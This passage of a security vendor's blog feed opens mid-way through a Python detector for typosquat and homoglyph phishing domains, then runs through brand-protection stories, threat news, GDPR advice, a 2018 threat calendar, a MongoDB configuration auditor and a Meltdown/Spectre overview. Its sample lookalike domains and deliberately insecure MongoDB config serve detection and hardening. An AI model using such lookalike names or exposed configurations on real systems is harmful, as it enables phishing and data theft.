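homoglyph swaps such as "rn" for "m", the brand placed as a subdomain of an
unrelated registrable domain (myetherwallet[.]uk[.]com), a swapped TLD, and
the brand embedded in a longer label.  Not Digital Shadows' SearchLight logic.
"""

# Character sequences that read like another character in many fonts.
# Replacing each with its canonical form lets "rnyetherwallet" collapse to
# "myetherwallet" before comparison.  Multi-character swaps run first.
CONFUSABLES = [
    ("rn", "m"), ("vv", "w"), ("cl", "d"),
    ("0", "o"), ("1", "l"), ("3", "e"), ("4", "a"), ("5", "s"), ("7", "t"),
]


def canonical(label: str) -> str:
    """Collapse confusable sequences so look-alike labels compare equal."""
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a typo-squat is usually one edit away from the brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(hostname: str, brand: str, brand_tld: str = "com"):
    """Return the impersonation technique matched, or None if not suspicious.

    Assumption: the registrable domain is the last two labels.  Production
    tooling should use the Public Suffix List, otherwise legitimate names
    such as brand.co.uk are misread as brand-as-subdomain.
    """
    labels = hostname.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    sld, tld, subs = labels[-2], labels[-1], labels[:-2]
    if sld == brand:
        return None if tld == brand_tld else "tld-swap"
    if canonical(sld) == canonical(brand):
        return "homoglyph"
    if levenshtein(sld, brand) == 1:
        return "typosquat"
    if any(canonical(s) == canonical(brand) for s in subs):
        return "brand-as-subdomain"
    if brand in sld:
        return "brand-embedded"
    return None


def scan(hostnames, brand, brand_tld="com"):
    """Return [(hostname, technique)] for every suspicious name in a feed."""
    flagged = []
    for host in hostnames:
        technique = classify(host, brand, brand_tld)
        if technique:
            flagged.append((host, technique))
    return flagged


# Constructed feed of newly seen hostnames (e.g. from certificate transparency
# or new-registration data).  Only myetherwallet.uk.com is from the posts.
SAMPLE_FEED = [
    "myetherwallet.com",          # the genuine domain
    "www.myetherwallet.com",      # a real subdomain of it
    "rnyetherwallet.com",         # "rn" masquerading as "m"
    "myetherwalet.com",           # one letter dropped
    "myetherwallet.uk.com",       # brand as a label under uk.com
    "myetherwallet.net",          # same name, different TLD
    "myetherwallet-login.com",    # brand embedded in a longer label
    "example.com",                # unrelated
]

if __name__ == "__main__":
    for host, technique in scan(SAMPLE_FEED, "myetherwallet"):
        print(f"{host:28} {technique}")
```

Each flagged name is a candidate for a takedown request or a block-list entry, not a verdict on its own; a registrant lookup and a look at the served content are what turn it into a case.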

    Malicious website domain detected

    Example: Malicious website domain detected, impact, recommended action, and takedown.

    2. Fake social media profiles that are indistinguishable from your real brand:

    By monitoring social media profiles for a very large customer, we discovered more than 500 fake social media profiles that were hijacking their brand. Some of the profiles looked so legitimate that the company was amazed by how closely the cyber criminals had replicated their legitimate social media presence; even some employees could not determine whether a profile was real or not. Cyber criminals used these fake profiles to sell counterfeit products and steal credit cards as well as credentials. Brand Damage Successful.

    The good news is with effective Digital Risk Management, fake social media profiles can be quickly identified and taken offline.

    Fake social media profile example

    3. Your customers unknowingly using fake mobile applications taking advantage of their privacy:

    By monitoring official app stores, including the Apple App Store and Google Play, as well as third-party app stores for references to the company’s branding, a malicious app impersonating their brand was detected. Analysis of this malicious app revealed that it had spyware capabilities and could steal information from its users. It could steal data ranging from sensitive documents to login credentials. Brand Damage Successful.

    The good news is that with effective digital risk management, the company was provided with an overview of the risks associated with the mobile application, screenshots of the application, and critically the ability to have the malicious app removed from the store.

[Figure: Fake mobile app detected, with impact, recommended action, and takedown]

These are just three real stories that had the potential to impact consumers and the brands they trust. There are hundreds more examples of brand exposure that you, as a marketing leader, should know about. You can also read up on additional brand exposure use cases here. Earlier, I asked you to listen to these stories because the same stories could be happening to your customers, putting your brand at risk. It is not my intention to scare you but to educate you on what is going on right now, today, this very minute.

This is why, as marketing leaders, we must work with our security team to manage digital risk and protect our brand. Once the business considers the security implications of phishing sites and social media, security shifts from an IT function to a company-wide concern. If you take action, you can minimize the impact of an attack or stop it before it affects your customers and your brand.

    Interested in learning more about protecting your brand from digital risks and the dark web? Join our webinar with FitBit on Brand Protection.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Dan Lowden
    CMO, Digital Shadows

    Dan Lowden has more than 20 years of executive-level experience in technology marketing. He has successfully driven demand generation and brand leadership for large enterprises and startups in security, mobile computing, wireless services, enterprise software, and cloud. Previously Dan was Chief Marketing Officer at Invincea, a machine learning next-gen antivirus company that was recently acquired by Sophos. Prior to that, he was VP of Marketing at vArmour, a leading data center and cloud security company. Previous roles also include VP of Marketing at Digby (acquired by Phunware), and VP of Marketing and Business Development at Wayport (acquired by AT&T). In addition, he has held marketing leadership positions at IBM, NEC, and Sharp Electronics. Dan holds a Bachelor of Science in Finance from Rider University and an MBA in International Business from Rutgers Graduate School of Management.

    Shadow Talk Update – 01.29.2018 Mon, 29 Jan 2018 18:38:43 +0000 In this week’s Shadow Talk podcast episode, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.

    Dark Caracal Infiltrates Devices for Espionage

    The “Dark Caracal” threat group has conducted espionage through mobile and desktop malware variants since 2012, researchers have determined. The group delivered malware via phishing links and physical access to targeted devices, harvesting user information without particularly sophisticated tactics, techniques and procedures (TTPs). Although Dark Caracal has been allegedly linked to the Lebanese state, inconsistent geographic targeting, lack of tailored phishing content and operational security flaws do not suggest an organized, state-led campaign. Mobile devices will highly likely remain vulnerable to espionage and financially driven threats, given the valuable nature of their stored content.

    Dridex Campaign Debuts Distribution Tactic

    A new spam email campaign delivering the “Dridex” banking malware demonstrated a previously unreported tactic: compromising file transfer protocol (FTP) servers to act as the download location for malicious documents. The threat actors were likely trying to avoid detection by email gateways and network policies, which consider FTP servers as trusted locations. Security company Forcepoint attributed the campaign to the “Necurs” botnet, based on its previous association with Dridex, although this was a low-scale campaign in comparison with prior Necurs activity. More targeting of FTP servers to distribute malware is likely.

    Turla Updates Malware After NCSC Public Advisory

    The “Neuron” malware associated with “Turla”, a Russia-linked advanced persistent threat (APT) group, was updated five days after a public advisory on Turla activity by the United Kingdom National Cyber Security Centre (NCSC). Neuron was adapted to avoid identification by the malware detection signatures published by the NCSC. Although the reason for the update is unclear, Turla may have responded to public reporting on its own campaigns. Alternatively, Turla may have experienced diminished success following the advisory, when new defensive measures were taken. As threat actors can quickly change malware obfuscation techniques, organizations should be proactive about network security, using threat intelligence, network log monitoring and detection signatures.

    Misconfigured Jenkins Servers Exposed Companies’ Sensitive Data

A researcher identified misconfigured servers running Jenkins, a software build automation tool. The accessible servers contained sensitive data pertaining to multiple British companies, including usernames, passwords, private keys and Amazon Work Space access tokens. The researcher identified exposed instances using the internet-connected-device search engine Shodan, then scraped the revealed URLs to find instances whose web interface required no authentication. It is unknown whether threat actors accessed any of the misconfigured servers; however, the method used to find them is easily replicable. Companies should ensure use of unique credentials and multi-factor authentication for internet-facing and cloud-based assets.

    Russian Fuel Customers Shortchanged in Criminal Operation

    A Russian criminal operation was disrupted after the perpetrators used software to over-charge individuals purchasing gas in Southern Russia. Malicious software was applied to electronic gas pumps and reportedly charged customers for more fuel than was delivered, shortchanging victims 3% to 7% per gallon of fuel pumped. The software enabled pumps, cash registers and back-end systems to display false data to victims and relied on complicit insiders at fuel stations. The developer of the software was reportedly arrested. The lucrative nature of the fuel industry means it will continue to be targeted by financially motivated criminal actors.

    Fancy Bears Leaks Documents from International Luge Federation

    The “Fancy Bears” hacking group publicly leaked documents purportedly sourced from the International Luge Federation (FIL), and claimed the violation of “principles of fair play”, particularly regarding drug tests. It is unknown how and when the documents were obtained, although threat group “APT-28” (aka Fancy Bear) allegedly targeted certain members of the International Olympic Winter Sports Federations in late 2017, including the FIL. The precise relationship between Fancy Bears and APT-28 is not publicly known, although APT-28 were previously associated with the compromise of the World Anti-Doping Agency in 2016. More leaks by Fancy Bears are likely in the near future.

    US Media Personalities Targeted in Twitter Phishing Campaign

    Media personalities and conservative individuals in the United States were targeted by a Twitter phishing campaign, potentially conducted by the Turkish Cyber Army. At least three Twitter accounts were confirmed as compromised, including that of journalists Sara Carter (@SaraCarterDC) and Greta Van Susteren (@greta), as well as Sheriff David Clarke (@SheriffClarkeTC). The campaign employed a spoofed Twitter login page, which was likely used to harvest credentials and compromise the three accounts. Although no official claim of responsibility was detected from the Turkish Cyber Army, this campaign would be consistent with previously observed activity. More media outlets will likely be targeted in the immediate future.

    Listen to this week’s Shadow Talk Episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.


    Data Privacy Day: 8 Key Recommendations for GDPR Readiness Fri, 26 Jan 2018 05:18:37 +0000 This Sunday is Data Privacy Day, “an international effort held annually on January 28th to create awareness about the importance of respecting privacy, safeguarding data and enabling trust”[1]. With GDPR regulations coming into effect May 2018, data privacy is even more top of mind for all organizations.

    If you have the responsibility for ensuring that your business meets the obligations under the GDPR, you are most likely either already down the path to compliance, or at least getting serious about plans to become compliant. Data exposure is becoming increasingly important as local, national, and international legal obligations bring about greater responsibilities for organizations to protect customer data in terms of compliance, notification, and monitoring.


    Here at Digital Shadows, we focus on providing our clients with comprehensive data loss monitoring and management across the widest range of intelligence sources found in the open, deep, and dark web. Through the combination of data science and machine learning, and more than 50 intelligence analysts, our service enables them to mitigate risk and demonstrate a long-term commitment to European and other regulators on this important issue.

    The GDPR regulations are an evolution of existing European Union (EU) privacy legislation ensuring that companies respect privacy, gain proper consents, and responsibly protect information and data under their control. While we recommend clients seek legal support, a great deal can be achieved by the following 8 activities:

1. Scope Your Data – Make sure that you understand which data is in scope for your organization. This should include data about your customers and employees (as a Controller), as well as data you process on behalf of other organizations (as a Processor). GDPR protects the personal data of individuals in the EU regardless of where that data is stored or where your organization is based. Organizations must also identify any new categories of sensitive data they hold, such as health information or information relating to children.
2. Understand Data Transfer Agreements – Businesses need to know clearly in which jurisdictions data is held and accessed from, and ensure that every transfer is properly accounted for. This matters most where data is held outside the EU, since such transfers need a recognized legal basis (for example an adequacy decision or standard contractual clauses).
    3. Update Consent Methods or Legal Basis for Processing – Update the methods via which consent is sought from individuals, or how the legal basis for lawful processing of that data is established. This should include assurances that the spirit of the data protection principles has been respected.
4. Prepare for Subject Access Requests – Individuals can already request a copy of the information an organization holds about them. Under GDPR, businesses cannot charge EU consumers for access to the data held about them and must respond within one month of receiving the request. Individuals have additional rights, such as the ‘right to be forgotten’ and the rights to rectification and data portability, that must be properly addressed.
5. Prepare for 72-Hour Notification – New rules govern how quickly authorities must be notified of a personal data breach. Data controllers must notify the national data protection regulator within 72 hours of becoming aware of a breach, unless the breach is unlikely to result in a risk to individuals’ rights and freedoms. Where the breach is likely to result in a high risk to those rights and freedoms, the affected individuals must be informed as well.
    6. Update Your Contracts with New Obligations – The legal contracts and policies must reflect suppliers’ obligations to their clients and the updated consent and requirements set out above.
    7. Update Your Privacy Policies and Statements – Ensure that the privacy policies and statements to consumers appropriately reflect obligations. The policies must be concise, transparent, intelligible, and free of charge. This includes the tailoring of language to different age groups; privacy information for children must be written appropriately.
8. Designate a Data Protection Officer – Nominating a Data Protection Officer (DPO) is mandatory for public authorities and for organizations whose core activities involve large-scale, regular and systematic monitoring of individuals or large-scale processing of special categories of data (such as health data). Other organizations may appoint one voluntarily, and many do.

    To learn more about becoming GDPR compliant, check out our recent paper, The Path to GDPR Compliance, where we provide recommendations  and the key resources that organizations can utilize to instill customer trust and brand protection.

    If you want to get involved in this year’s Data Privacy Day efforts, visit StaySafeOnline’s website for more information.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 



    Don’t Rely on One Star to Manage Digital Risk, The Key is Total Coverage Tue, 16 Jan 2018 16:12:58 +0000 This post originally appeared on

    Vince Lombardi, one of the greatest coaches of all time said, “The achievements of an organization are the results of the combined effort of each individual.” Think about the most successful coaches and you’ll see a common thread – the ability to bring players and staff together and use their talents effectively and intelligently to defeat opponents. Phil Jackson accomplished this with different NBA franchises and Joe Gibbs with different quarterbacks. They didn’t count on any one “star” to carry the team. Nor did they focus their efforts defending against one big threat. They led their teams to victory by looking at the big picture and understanding how to strategically apply capabilities to defeat whatever the opposition pulled out of their bag of tricks.

    Wouldn’t it make sense to follow a similar approach to defeat adversaries and mitigate digital risk, the risk associated with expanding our digital footprint as we increase business activities on the internet and via cloud solutions? But, typically, we don’t.

    Just as great coaches know they’re up against an entire team that can vary their plays and draw on different skills with the sole aim of defeating them, the risks as you digitally transform your business come from all kinds of adversaries and places beyond the boundary. Individually, you don’t just have a dark web problem, or an open source problem or a social media problem. You have a problem with ALL external digital risks and threat actors seeking to do your business harm. 

    Digital risks include cyber threats, data exposure, brand exposure, third-party risk, VIP exposure, physical threats and infrastructure exposure. Often these threats and risks span data sources and cannot be detected in full context by any point solution or even by multiple solutions used in isolation. You need insight across the widest range of data sources possible to mitigate digital risk and better protect your organization. Here are three examples.  

    1. We all know organizations struggle to keep up with patching, and this challenge isn’t expected to go away any time soon. Gartner predicts that through 2020, 99% of vulnerabilities exploited will continue to be the ones known by security and IT professionals for at least one year. Addressing every vulnerability as soon as a patch is issued isn’t possible for most IT teams. But determining which vulnerabilities to patch first can be problematic. By monitoring open, deep and dark web forums as well as social media you can learn which vulnerabilities are being discussed as popular vectors for attack. These sources can also reveal which exploit kits are using specific vulnerabilities and even if those exploit kits are being used to target your industry. Armed with this information, you can make more informed decisions about which systems and applications to patch first and more effectively and efficiently mitigate risk. 
    2. Ideologically motivated, hacktivists are far from quiet. They typically use social media to promote their cause and garner attention and often announce their targets on Facebook or Twitter. They also use Internet Relay Chat (IRC) to orchestrate attacks in real-time. Monitoring social media and open source IRC channels for an uptick in hashtags and traffic is a leading indicator of whether a cause is gaining traction. Mentions of your company, key executives or IP addresses will help you determine if you’re being targeted so you can proactively boost security controls.
3. A more complex example, but one that has been in the spotlight recently, is database extortion. In this scenario, attackers look for publicly exposed data stores, for example open Amazon S3 buckets or databases listening on the internet without authentication. From there, they may find information allowing them to connect remotely to a server or desktop and infiltrate your organization further. Or, as in the MongoDB extortion pandemic, they delete the data and replace it with a ransom note demanding bitcoin in exchange for its restoration. Should the ransom go unpaid, attackers may then pressure the CEO by posting a message to Pastebin or via social media. There are several points of compromise here and several ways to gain a deeper understanding of the attack. To learn the entire sequence of events, the impact to your organization and how to mitigate digital risk in the future, you need more than visibility into S3 buckets. You need access to the criminal marketplaces that sell access to compromised servers and remote desktop protocol (RDP) endpoints, to look for your IP addresses. Access to Pastebin and monitoring of social media channels let you check for mentions of your company and executives. The dark web can provide threat actor profiles to understand their motivation and gauge credibility.
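The MongoDB extortion wave in the third example worked because instances listened on every interface with authorization disabled, so the cheapest monitoring of all is checking your own configuration before a scanner does. The Python below is an added example, not code from the original post: it parses the two relevant keys of a mongod.conf and flags that combination, with a constructed weak configuration beside a hardened one. The private address 10.0.0.5, the sample configs and the default version cut-off are assumptions noted in the code.

```python
"""Audit the two mongod.conf settings behind the MongoDB extortion wave:
listening on every interface while authorization is disabled.
Added example with constructed configs; not code from the original post."""

# Constructed: the exposed shape. Anyone who can reach TCP/27017 can list,
# drop and replace every database, which is what the extortion scripts did.
WEAK_CONF = """\
net:
  port: 27017
  bindIp: 0.0.0.0
security:
  authorization: disabled
"""

# Constructed: loopback plus one private app-server address (10.0.0.5 is an
# assumed placeholder) and mandatory authentication.
HARDENED_CONF = """\
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.0.5   # only the hosts that need the database
security:
  authorization: enabled       # every client must authenticate
"""


def parse_mongod_conf(text):
    """Parse the two-level 'section:' / '  key: value' YAML subset that the
    net and security sections of mongod.conf use; comments are stripped.
    (A real deployment would hand the file to a YAML parser; this keeps the
    example dependency-free.)"""
    cfg, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        if not line.startswith(" "):
            section = line.strip().rstrip(":")
            cfg[section] = {}
        elif section is not None:
            key, _, value = line.strip().partition(":")
            cfg[section][key.strip()] = value.strip()
    return cfg


def audit_mongod_conf(text, version=(3, 6)):
    """Return findings for the config; an empty list means both checks passed.
    `version` matters because a missing bindIp meant 'all interfaces' before
    mongod 3.6 and 'localhost only' from 3.6 on (3.6 assumed when not given)."""
    cfg = parse_mongod_conf(text)
    net = cfg.get("net", {})
    bind_ip = net.get("bindIp")
    if bind_ip is None:
        bind_ip = "127.0.0.1" if version >= (3, 6) else "0.0.0.0"
    listens_everywhere = (
        net.get("bindIpAll", "false").lower() == "true"
        or any(ip.strip() in ("0.0.0.0", "::") for ip in bind_ip.split(","))
    )
    auth_enabled = cfg.get("security", {}).get("authorization", "disabled") == "enabled"

    findings = []
    if listens_everywhere:
        findings.append("net.bindIp: mongod accepts connections on all interfaces")
    if not auth_enabled:
        findings.append("security.authorization: clients are not required to authenticate")
    if listens_everywhere and not auth_enabled:
        findings.append("CRITICAL: anyone who can reach the port can read, drop and replace the data")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod_conf(conf) or ["no findings"])
```

The version argument is the caveat that bit many victims: the 2017 wave hit mostly older builds whose binary default was to bind to all interfaces, so a config with no bindIp line at all was exposed on those versions and is not on 3.6 and later. Binding to specific addresses and enabling authorization are both required; a host firewall in front of the port is the third layer, not a substitute.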

    In each of these three examples, tracking just one source, or even all sources but in isolation would not give you the full context for any one of these threats. Like a coach, you need to be able to see the big picture with an approach that monitors the entire Internet for risks to your business. Only then can you take the right actions to keep your business and reputation intact and mitigate digital risk in the future.  

    Want to learn how we can help manage your organization’s digital risk? Watch our full demo video here.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Another Year Wiser: Key Dates to Look Out For In 2018 Wed, 10 Jan 2018 17:37:57 +0000 Early last year, we published a blog outlining the events of 2017 that were most likely to attract the attention of malicious actors who would present potential risks to your organizations. Unsurprisingly, many of the usual suspects were active at significant points in the year, such as tax deadline day, the German elections, and Black Friday.

    We are doing this again this year and want to make sure that you have these key events on your radar. When assessing the key events of 2018, we need to look at the activities of cybercriminals, hacktivists and nation-state affiliated actors.

Date | Event | Actor | Affected Geographies | Targets
6 February | G20 summit | Nation State; Hacktivism | Argentina | Government
9 February | Winter Olympics | Nation State; Hacktivism; Cybercrime | South Korea | Event Sponsors, Consumers, Retailers; Hospitality
13 February | Tibetan Independence Day | Nation State; Hacktivism | Tibet; China; India | Government
4 March | Italian Elections | Nation State | Italy | Government
18 March | Russian Presidential Election | Nation State | Russia | Government
17 April | Tax Deadline Day | Cybercriminal | United States | Consumers
14 June | FIFA World Cup | Cybercriminal; Nation State; Hacktivism | Russia | Event Sponsors, Consumers, Retailers; Hospitality
14 August | Pakistan Independence Day | Nation State | India; Pakistan | Unknown
9 September | Swedish Elections | Nation State | Sweden | Government
18 September | Anniversary of the Mukden Incident | Hacktivism | Japan | Unknown
November | Irish Presidential Election | Nation State | Ireland | Retail, Consumers
5 November | OpVendetta | Hacktivism | All | Finance
23 November | Black Friday | Cybercriminal | United States | Retail, Consumers
26 November | Cyber Monday | Cybercriminal | United States | Retail, Consumers
25 December | Christmas Day | Hacktivism | All | Online Gaming


    With an ever-increasing amount of money spent online, there are more opportunities for card not present fraud (fraud that can occur with transactions that are conducted online or over the phone). Just as we discovered in our “Retail Risks” whitepaper, these are risks that exist throughout the year. During Black Friday and Cyber Monday, criminal efforts tend to increase to take advantage of the increased number of transactions being made. Similarly, as we approach 17th April (that’s two days later than normal), we’re likely to see new techniques around tax return fraud emerge as criminals look to bypass IRS antifraud measures.

There are other events that are likely to provide rich pickings for cybercriminals. Two years ago, we wrote about the risks to the Rio Olympics for retailers, sponsors, and consumers. Similarly, the Winter Olympics and the FIFA World Cup are expected to attract cybercriminals seeking to exploit card-wielding tourists.



    Despite the predictability of some reoccurring online protests, the significance of hacktivist campaigns is often difficult to anticipate. One example of such reoccurring campaigns is OpVendetta, which occurs each year on November 5. We monitor the levels of participation and organization to assess the likely impact of the campaign, as seen recently with the OpCatalunya operation that targets companies operating in Spain.

    Of course, hacktivist campaigns are not always as they appear; Anonymous Poland, for example, have previously demonstrated characteristics of a nation-state proxy. We will have to wait and see whether more hacktivist groups demonstrate techniques beyond the typical denial of service attacks and website defacements.


    Nation-State/Nation-State Affiliated

    Since the 2016 U.S. Presidential Election, election season has become a common time of the year for nation states and their affiliated groups to develop online campaigns. There are a range of tools and techniques widely available to actors who seek to influence elections. We’ll be keeping an eye on a host of elections coming up in 2018, but the key ones will be the Russian, Swedish, and Italian elections.


    While this is by no means a definitive list of 2018 hot spots, outlining these events at the beginning of the year provides us with areas of focus. With this focus, we can monitor for the key drivers and assess the likely impact of a particular campaign or event. To stay up to date with the latest key events, threat intelligence, and research, subscribe to our email list here.

Why All Companies, CEO, CFO, CLO, and Board of Directors Should Require Digital Risk Management to Mitigate Corporate Risk Wed, 10 Jan 2018 16:16:27 +0000 Cyber attacks on businesses are now weekly news as data breaches are announced regularly. However, until recently many corporate executives did not understand, or did not share the view of, the importance of addressing Digital Risk at the Board level. The Board’s role in understanding and monitoring digital and cyber risk has been highlighted by a multitude of lawsuits alleging Boards were asleep at the switch in the face of a known danger.

    Executives and Boards at all companies, especially public companies, face mounting pressure to consider what a worst-case cyber event would look like and how that event would be handled. What corporate governance structures would kick in? What will the legal fallout be —whether it is privacy litigation, shareholder suits or criminal investigations? To fully grasp the magnitude of such risk, Boards must address specific questions and implement effective policies that protect their customers, their organizations and themselves. In some states and countries, Board members may be personally liable for cybersecurity gaps and experts foresee that personal liability will only accelerate.

    Board of Director members are responsible for ensuring the corporation is managed in the shareholders’ best interest including:

1. Fiduciary duties of Directors and Officers regarding Digital Risk and Cybersecurity. Most officers and directors understand that they must act on an informed basis, in good faith, and in the company’s best interests. Proper preparedness and risk management are critical to insulating officers and directors from liability. Boards must hold frequent meetings to analyze cyber risks and implement plans of action. If appropriate, create a committee to review cyber issues and investigate data incidents and breaches. Boards must implement a risk management program and a monitoring plan, test the program to ensure compliance, and investigate possible violations.
    2. Officers and Directors should discharge their Digital Risk fiduciary duties. Digital Risk management programs must have the right technologies in place to identify where risks can have the most impact on the business and brand. Companies should have policies in place that detail the expected response to incidents and ensure that system controls are in place. A prepared team is needed, equipped with the tools and ability to take immediate action when problems arise and have the authority to monitor and test, both internally and externally, potential threats. Cyber incidents impact multiple levels of an organization and departments including legal, IT, risk/insurance, human resources, marketing, and public relations. These departments should be tasked with providing input in addition to that of board members and management. The companies best prepared to prevent and respond to cyber attacks recognize that this multifaceted preparedness is an ongoing cycle, and not simply a one-time list of tasks to complete.

    To demonstrate that a Board has properly discharged its duties, it must work with management to ensure proper teams have organized plans to prevent and respond to any breaches. Therefore, a company must constantly assess cyber risk trends and threats. Just because nothing appears to be happening on a daily, weekly, monthly or annual basis, does not mean an incident may not occur.

    The business judgment rule is a legal principle protecting officers, directors, managers and other agents of a corporation from liability for loss incurred as a result of business decisions that are within their authority and power to make when sufficient evidence demonstrates that the transactions were made in good faith. To ensure protection under the business judgment rule, it is wise to have regular presentations for pertinent committees to provide updates on trends and threats, and to ensure that your security IT practices are up to date.

    1. Investing in a Digital Risk framework. Companies struggle to determine how much to spend on IT security, an investment many liken to insurance — no one wants to pay more than they have to. If you are a public company, spend the money to protect the business. You no longer can afford to penny pinch. The liabilities, penalties and litigation impact are significant. Companies spend an average of 6-7% of their IT budget on security technology, outside services and staff. How much an organization invests in IT security stems from a range of criteria. Companies that are consumer facing, have a large attack surface, a recognized brand, highly guarded intellectual property, and compliance requirements to industry regulations and government legislation tend to outspend their peers. The reality is organizations of all types have experienced security breaches. There remains a misplaced belief in “security by obscurity” among organizations with lesser known brands, smaller attack surface, and less stringent industry regulations. The situation in the last 2-3 years has changed substantially. With so many global state actors and well-funded cybercrime organizations, IT security costs are increasing rapidly.

The right answer does not start with a dollar figure; companies should instead work through a Digital Risk management process. As a publicly listed company, you can no longer take an ad hoc approach, basing budgeting decisions on trial and error or reacting to problems as they arise instead of proactively adopting a security framework. This process is monitored and repeated, covering both internal networks and the external environment where your assets may have leaked through malicious action or may be lying unintentionally in the open, and shortcomings are addressed over time. This simple yet time-consuming process is undertaken not only by large public companies but also by midmarket and small businesses, which face the same cyber risks but typically with fewer IT security resources. With cybercrime advancing at unprecedented levels, companies must proactively implement a security risk management framework, develop technology internally, hire or outsource security professionals commensurate with their risk, train all employees on security awareness, and maintain a real-time incident response playbook that balances digital threat intelligence and risk mitigation.


    Want to learn more around GDPR and your team’s role in compliance and digital risk management? Download our latest report, “The Path to GDPR Compliance”.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Digital Shadows Launches Weekly Newsletter: “In the Shadows” Mon, 08 Jan 2018 10:30:07 +0000 Digital Shadows has just launched a new research-led weekly newsletter, “In the Shadows”, and podcast, “Shadow Talk”. Both highlight key findings of primary-source research our Intelligence Team is conducting, along with the latest threat actors, campaigns, security events and industry news. From technical exploit analysis to strategic insights, the content of the newsletter and podcast allows a timely and concise “analyst’s eye view” of key information security issues.

    In upcoming weeks, expect to be updated on our ongoing research into the cybercriminal underground, as well as the effect that increasing exposure and scrutiny from law enforcement has had on this community over the past few years. The latest findings can be found each week in the newsletter, here:

    The cybercriminal community has been significantly disrupted by the high-profile take-down of dark web criminal marketplaces, such as the Silk Road, HANSA and AlphaBay. Rather than overtly deterring cybercriminal activity, the prominent media coverage has, in fact, increased the number of users logging onto cybercriminal forums. What has changed significantly from the “back in the day” forums to the new generation is the trust models users are creating to ensure security.

    The Intelligence Team looks forward to sharing this research via “In the Shadows.” Stay up to date with the latest security news and trends by signing up to receive “In the Shadows”, in your inbox, every Monday:

    You can also listen to the latest research subjects discussed on “Shadow Talk”, which will feature the Digital Shadows Research and Intelligence Teams covering a hot topic in security each week.

    Hear our very first Shadow Talk podcast episode here:

    Don’t miss an episode—sign up now for updates:

GDPR: Why You Need to Consider the Personal Data That Lies Outside of Your Organization Thu, 04 Jan 2018 21:48:41 +0000 In 2010, reports emerged that the Information Commissioner’s Office (ICO) could now fine organizations up to £500,000 ($677,000) under the Data Protection Act. Eight years later, that cap has proven woefully insufficient as a deterrent to organizations’ lax attitude towards data protection. From May 2018, organizations can be fined up to four percent of their global annual turnover or €20 million ($24 million), whichever is greater.

    While the potential fines under GDPR have attracted the headlines, our new report, GDPR: A Path to Compliance, distills some of the key changes coming and provides a framework with practical advice on how to minimize compliance challenges when the legislation (and the fines) comes into force in May 2018. GDPR isn’t new; it has been in the works since at least January 2012, when the European Commission proposed an update to data protection regulation. As the number of breaches continues to increase (albeit not necessarily publicly reported), this issue has only become more important.

    The “D” in GDPR is focused on data, and so Information Technology plays a critical role. While there must be an effort to understand what sensitive data sits within the organization, organizations must also look beyond the perimeter to understand how and where EU citizen personal data is exposed.


    First of all, organizations need to consider what is meant by “personal data”. The definition was already broad under the EU Data Protection Directive, quoted below, and GDPR extends it further by explicitly naming online identifiers, location data and genetic data:

    “‘Personal data’ shall mean any information relating to an identified or identifiable natural person (‘Data Subject’); an identifiable person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity.”

    In reality, this means that personal data extends to far more than before – even IP addresses and browser cookies are considered to be personal data. Organizations need to be aware of what personal data they hold, either as a Controller (data about your own customers and employees) or Processor (data that you process on behalf of other organizations).

    Given this broad definition, how can organizations go about becoming GDPR compliant? Our paper sets out four key stages of GDPR compliance: discover, define, deliver, and detect. Within each of these stages, we provide advice and the key resources that organizations can turn to.

    GDPR compliance cannot be achieved easily with a shiny new widget or product. Instead, a well-thought-out program that addresses data loss management will help organizations demonstrate a high level of compliance to a regulator and minimize the commercial and reputational risks associated with a regulatory failure.

    With the scope of personal data expanded, organizations cannot simply protect their data at the boundary. Download our report to find out how to manage your data exposure in line with GDPR.

    Meltdown and Spectre: The Story So Far Thu, 04 Jan 2018 18:27:12 +0000 On Wednesday, rumors surfaced that there were vulnerabilities in the majority of microprocessors, which would allow attackers to read system memory belonging to the kernel, the most privileged part of a modern operating system. The kernel manages processes, including starting and ending user programs, enforcing security settings, handling memory, and controlling hardware such as storage and network devices.

    Later in the day the security community rallied together to produce a barrage of research on two different attacks that took advantage of these flaws: enter Meltdown and Spectre.

    With so much overlapping commentary, and further details likely to be released, it’s hard to make sense of exactly what’s going on and what systems are at risk. Here’s what we know – and do not yet know – so far. The Digital Shadows Intelligence team conducted this analysis by:

    1. Reproducing and validating the Spectre Proof of Concept Code (POC) found in the Spectre academic whitepaper,
    2. Researching criminal forums for related activity,
    3. Collating publicly available research from the security community.

    What we know about Meltdown and Spectre

    • Meltdown and Spectre were discovered by at least three different groups, including researchers at Google Project Zero, Cyberus Technology and Graz University of Technology. The flaws were responsibly disclosed back in June 2017, but details of the vulnerabilities only appeared yesterday on January 3rd. It seems the affected companies wanted to keep the news under wraps until fixes were ready to be released, but the vulnerabilities were disclosed earlier than planned.
    • Meltdown is an attack that breaks the isolation between user applications and the operating system kernel: an unprivileged process can read kernel memory, and with it passwords and other sensitive data the kernel holds or maps. The vulnerability is tracked as CVE-2017-5754.
    • Spectre is an attack that breaks the isolation between applications by abusing speculative execution, a feature modern processors use to run ahead of a branch before its condition is known. Under the right conditions, a victim process can be induced to speculatively load data it would never return architecturally, and the attacker recovers that data through a cache timing side channel. Spectre is tracked as CVE-2017-5753 (bounds check bypass) and CVE-2017-5715 (branch target injection). Digital Shadows analysts ran the proof-of-concept code referenced in the Spectre whitepaper, and it functioned correctly.


    Spectre proof of concept exploit tested on an Ubuntu 16.04 VM by Digital Shadows

